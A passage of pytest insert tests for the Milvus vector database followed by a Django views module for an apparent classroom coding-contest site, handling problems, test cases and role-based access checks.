def test_insert_default_tag(self, connect, collection):
'''
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
assert len(ids) == default_nb
res_count = connect.count_entities(collection)
assert res_count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_not_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_tag param
expected: error raised
'''
tag = gen_unique_str()
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, default_entities, partition_tag=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_tag param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
connect.flush([collection])
res_count = connect.count_entities(collection)
assert res_count == 2 * default_nb
@pytest.mark.level(2)
def test_insert_without_connect(self, dis_connect, collection):
'''
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
ids = dis_connect.bulk_insert(collection, default_entities)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert entities in collection, which not existed before
method: insert entities collection not existed, check the status
expected: error raised
'''
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(gen_unique_str("not_exist_collection"), default_entities)
def test_insert_dim_not_matched(self, connect, collection):
'''
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
'''
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, insert_entities)
def test_insert_with_field_name_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
'''
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_type_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_type_not_match_B(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.DOUBLE)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_value_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
'''
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
'''
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
'''
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
'''
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
'''
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_value(self, connect, collection):
'''
target: test insert entities, with no vector field value
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_type(self, connect, collection):
'''
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_name(self, connect, collection):
'''
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus.bulk_insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
t = TestThread(target=insert, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
res_count = milvus.count_entities(collection)
assert res_count == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.level(2)
def _test_insert_disable_auto_flush(self, connect, collection):
'''
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
'''
delete_nums = 500
disable_flush(connect)
ids = connect.bulk_insert(collection, default_entities)
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
def test_insert_binary_entities(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
def test_insert_binary_entities_new(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities_new)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
def test_insert_binary_tag(self, connect, binary_collection):
'''
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_tag param
expected: the collection row count equals to nb
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.bulk_insert(binary_collection, default_binary_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(binary_collection, default_tag)
# TODO
@pytest.mark.level(2)
def test_insert_binary_multi_times(self, connect, binary_collection):
'''
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
'''
for i in range(default_nb):
ids = connect.bulk_insert(binary_collection, default_binary_entity)
assert len(ids) == 1
connect.flush([binary_collection])
assert connect.count_entities(binary_collection) == default_nb
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
'''
connect.create_index(binary_collection, binary_field_name, get_binary_index)
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
info = connect.get_collection_info(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
info = connect.get_collection_info(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
def test_insert_binary_search(self, connect, binary_collection):
'''
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1, metric_type="JACCARD")
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert res
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check status")
assert result
def test_insert_async(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True)
ids = future.result()
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.level(2)
def test_insert_async_false(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
ids = connect.bulk_insert(collection, gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(ids) == nb
def test_insert_async_callback(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_status)
future.done()
@pytest.mark.level(2)
def test_insert_async_long(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 50000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result) == nb
connect.flush([collection])
count = connect.count_entities(collection)
logging.getLogger().info(count)
assert count == nb
@pytest.mark.level(2)
def test_insert_async_callback_timeout(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 100000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
count = connect.count_entities(collection)
assert count == 0
def test_insert_async_invalid_params(self, connect):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
collection_new = gen_unique_str()
future = connect.bulk_insert(collection_new, default_entities, _async=True)
with pytest.raises(Exception) as e:
result = future.result()
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
entities = []
future = connect.bulk_insert(collection, entities, _async=True)
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
def test_insert_vector_multi_collections(self, connect):
'''
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
'''
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(ids) == default_nb
count = connect.count_entities(collection_name)
assert count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(ids) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_insert_vector_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entity)
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection_name)
assert count == 0
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection)
assert count == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush()
count = connect.count_entities(collection_name)
assert count == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_search_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
result = connect.search(collection_name, default_single_query)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_search_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2 a while
method: search collection , sleep, and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
result = connect.search(collection_name, default_single_query)
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(id_collection, default_entities, ids)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception):
connect.bulk_insert(collection_name, default_entity)
def test_insert_with_invalid_tag_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
else:
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
field_name = get_field_name
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_vector_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.level(2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.level(2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entities)
src_vector = tmp_entity[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
|
views.py
|
import os
import threading
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from django.shortcuts import render, redirect
from django.utils import timezone
from django.utils.datastructures import MultiValueDictKeyError
import submissions.views
from classroom.models import ClassroomStudents
from contest.models import Contest
from lab.models import Lab
from submissions.models import Submission
# from submissions.views import submitCode
from users.decorators import faculty_required
from .models import Problem, TestCase, ProblemComment
'''
Function for Role based authorization of Problem; upon provided the pid to the request parameter
'''
def customRoleBasedProblemAuthorization(request, problem, isItLab):
user = request.user
# If Faculty hasn't created classroom
# or Student is not enrolled to the classroom
if user.isStudent:
try:
if isItLab:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=problem.lab.classroom)
else:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=problem.contest.classroom)
except ObjectDoesNotExist:
return False
else:
if ((isItLab and problem.lab.classroom.user != user) or (
not isItLab and problem.contest.classroom.user != user)):
return False
return True
'''
Function for Role based authorization of Problem of Test case; upon provided the pid to the request parameter
'''
def customRoleBasedTestProblemAuthorization(request, problem):
user = request.user
if ((not problem.doesBelongToContest and problem.lab.classroom.user != user) or (
problem.doesBelongToContest and problem.contest.classroom.user != user)):
return False
return True
'''
Function for Role based authorization of Lab; upon provided the labId to the request parameter
'''
def customRoleBasedLabAuthorization(request, lab):
user = request.user
# If Faculty hasn't created classroom
# or Student is not enrolled to the classroom
if user.isStudent:
try:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=lab.classroom)
except ObjectDoesNotExist:
return False
else:
if lab.classroom.user != user:
return False
return True
'''
Function for Role based authorization of Contest; upon provided the contestId to the request parameter
'''
def customRoleBasedContestAuthorization(request, contest):
user = request.user
# If Faculty hasn't created the classroom for which current contest belongs
# or If Student is not enrolled to the classroom for which current contest belongs
if user.isStudent:
try:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=contest.classroom)
except ObjectDoesNotExist:
return False
else:
if contest.classroom.user != user:
return False
return True
'''
Function to get Problem based on provided pid
'''
def getProblem(request):
try:
# If request method is GET
if request.method == "GET":
pid = request.GET["pid"]
else:
pid = request.POST["pid"]
problem = Problem.objects.get(problemId=pid)
return True, pid, problem
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return False, None, None
'''
Function to get Test Case based on provided tid
'''
def getTestCase(request):
try:
# If request method is GET
if request.method == "GET":
return False, None, None
else:
tid = request.POST["tid"]
print(tid)
testCase = TestCase.objects.get(testCaseId=tid)
return True, tid, testCase
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return False, None, None
'''
Function to get Contest/Lab based on provided Id
'''
def getContestOrLab(request):
try:
isItLab = False
labId = None
contestId = None
if request.method == "GET":
if (request.GET.get('labId')):
labId = request.GET["labId"]
else:
contestId = request.GET["contestId"]
else:
if (request.POST.get('contestId')):
contestId = request.POST["contestId"]
else:
labId = request.POST["labId"]
if (not labId and contestId):
contest = Contest.objects.get(contestId=contestId)
isItLab = False
return True, contestId, contest, isItLab
elif (not contestId and labId):
lab = Lab.objects.get(labId=labId)
isItLab = True
return True, labId, lab, isItLab
else:
return False, None, None, False
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
print('exception')
return False, None, None, False
'''
Function which will convert Django DateTime to HTML DateTime
'''
def convertDjangoDateTimeToHTMLDateTime(contest):
# Converting Datetime field into HTML formatted string
startTimeString = str(contest.startTime.strftime("%Y-%m-%dT%H:%M"))
endTimeString = str(contest.endTime.strftime("%Y-%m-%dT%H:%M"))
return startTimeString, endTimeString
'''
Function to get list of all Test Cases belonging to the Problem
'''
@faculty_required()
def testList(request):
# If problem not exist and If Contest/Lab is not belonging to Faculty or Student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedTestProblemAuthorization(request, problem):
return render(request, 'accessDenied.html', {})
testCases = TestCase.objects.filter(problem=problem)
isOver = False
if problem.doesBelongToContest:
if timezone.now() >= problem.contest.endTime:
isOver = True
else:
if timezone.now() >= problem.lab.deadline:
isOver = True
return render(request, 'problem/testsList.html',
{'tests': testCases, 'pid': pid, 'problem': problem, 'isOver': isOver})
'''Function which executes thread in background'''
def reevaluateSubmissionThread(problemId, request):
problem = Problem.objects.get(problemId=problemId)
print("Submission Reevaluation Started for problem :- ", problem.title)
submittedSubmissions = Submission.objects.filter(problem=problem)
for submission in submittedSubmissions:
uploadDirectory = settings.MEDIA_ROOT
file = open(os.path.join(uploadDirectory, submission.filePath), "r")
code = file.read()
request.GET._mutable = True
request.GET["code"] = code
request.GET["problemId"] = problemId
submissions.views.submitCode(request, update=True, submission=submission)
file.close()
print("Submission Reevaluation Finished for problem :- ", problem.title)
'''Function for reevaluating submissions after updating test cases'''
def reEvaluateSubmissions(request, problemId):
thread = threading.Thread(target=reevaluateSubmissionThread, args=[problemId, request])
thread.setDaemon(True)
thread.start()
'''
Function to create Test Case belonging to the Problem
'''
@faculty_required()
def testCreate(request):
# If problem not exist and If Contest/Lab is not belonging to Faculty or Student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedTestProblemAuthorization(request, problem):
return render(request, 'accessDenied.html', {})
try:
outputFile = request.FILES['outputFile']
inputFile = request.FILES['inputFile']
except MultiValueDictKeyError:
return render(request, 'problem/testsList.html', {"errorMessage": "Files are not selected"})
newTestcase = TestCase(problem=problem, inputFile=inputFile, outputFile=outputFile)
newTestcase.save()
reEvaluateSubmissions(request, problem.problemId)
return redirect('/problems/tests?pid=' + pid)
'''
Function to create Test Case belonging to the Problem
'''
@faculty_required()
def testDelete(request):
result, tid, testCase = getTestCase(request)
if not result:
return render(request, '404.html', {})
else:
if not customRoleBasedTestProblemAuthorization(request, testCase.problem):
return render(request, 'accessDenied.html', {})
testCase.inputFile.delete()
testCase.outputFile.delete()
testCase.delete()
reEvaluateSubmissions(request, testCase.problem.problemId)
return redirect('/problems/tests/?pid=' + str(testCase.problem.problemId))
'''
Function to get list of all Problems
'''
@login_required(login_url='/users/login')
def list(request):
# If classroom not exist and If Classroom is not belonging to Faculty or Student
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
idName = ""
# Problem list will be shown belonging to the particular contest or lab
isOver = False
isStarted = False
hours = timezone.now().hour
minutes = timezone.now().minute
seconds = timezone.now().second
if isItLab:
idName = "labId"
problems = Problem.objects.filter(lab=object, doesBelongToContest=False)
if timezone.now() >= object.deadline:
isOver = True
else:
idName = "contestId"
problems = Problem.objects.filter(contest=object, doesBelongToContest=True)
if timezone.now() >= object.endTime:
isOver = True
hours = object.endTime.hour - timezone.now().hour
minutes = object.endTime.minute - timezone.now().minute
seconds = object.endTime.second - timezone.now().second
if timezone.now() >= object.startTime and timezone.now() <= object.endTime:
isStarted = True;
return render(request, 'problem/list.html',
{'problems': problems, 'idName': idName, 'idValue': objectId, 'isItLab': isItLab, "object": object, 'isOver': isOver, 'isStarted': isStarted, 'hours': hours, 'minutes': minutes, 'seconds': seconds})
'''
Function to create Problem
'''
@faculty_required()
def create(request):
# If classroom not exist and If Classroom is not belonging to Faculty or Student
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
idName = ""
if isItLab:
idName = "labId"
else:
idName = "contestId"
if request.method == 'GET':
return render(request, 'problem/create.html', {'idName': idName, 'idValue': objectId})
# Saving the Problem data
title = request.POST['title']
description = request.POST['description']
difficulty = request.POST['difficulty']
points = request.POST['points']
timeLimit = request.POST['timeLimit']
if isItLab:
newProblem = Problem(title=title, description=description, difficulty=difficulty, points=points,
timeLimit=timeLimit, doesBelongToContest=False, lab=object)
else:
newProblem = Problem(title=title, description=description, difficulty=difficulty, points=points,
timeLimit=timeLimit, doesBelongToContest=True, contest=object)
newProblem.save()
return redirect("/problems/?" + idName + "=" + objectId)
'''
Function to get Problem details
'''
@login_required(login_url='/users/login')
def view(request):
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
# If problem not exist and If Contest/Lab is not belonging to Faculty or Student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, isItLab):
return render(request, 'accessDenied.html', {})
idName = ""
isOver = False
if isItLab:
idName = "labId"
if timezone.now() >= object.deadline:
isOver = True
else:
idName = "contestId"
if timezone.now() >= object.endTime:
isOver = True
return render(request, 'problem/view.html',
{'problem': problem, 'idName': idName, 'idValue': objectId, 'isOver': isOver})
'''
Function to edit the Problem details
'''
@faculty_required()
def edit(request):
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
# If problem not exist and If Contest/Lab is not belonging to Faculty or Student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, isItLab):
return render(request, 'accessDenied.html', {})
idName = ""
if isItLab:
problem.doesBelongToContest = False
idName = "labId"
else:
problem.doesBelongToContest = True
idName = "contestId"
if request.method == 'GET':
return render(request, 'problem/edit.html', {'problem': problem, 'idName': idName, 'idValue': objectId})
# Saving the Problem data
problem.title = request.POST['title']
problem.description = request.POST['description']
problem.difficulty = request.POST['difficulty']
problem.points = request.POST['points']
problem.timeLimit = request.POST['timeLimit']
problem.save()
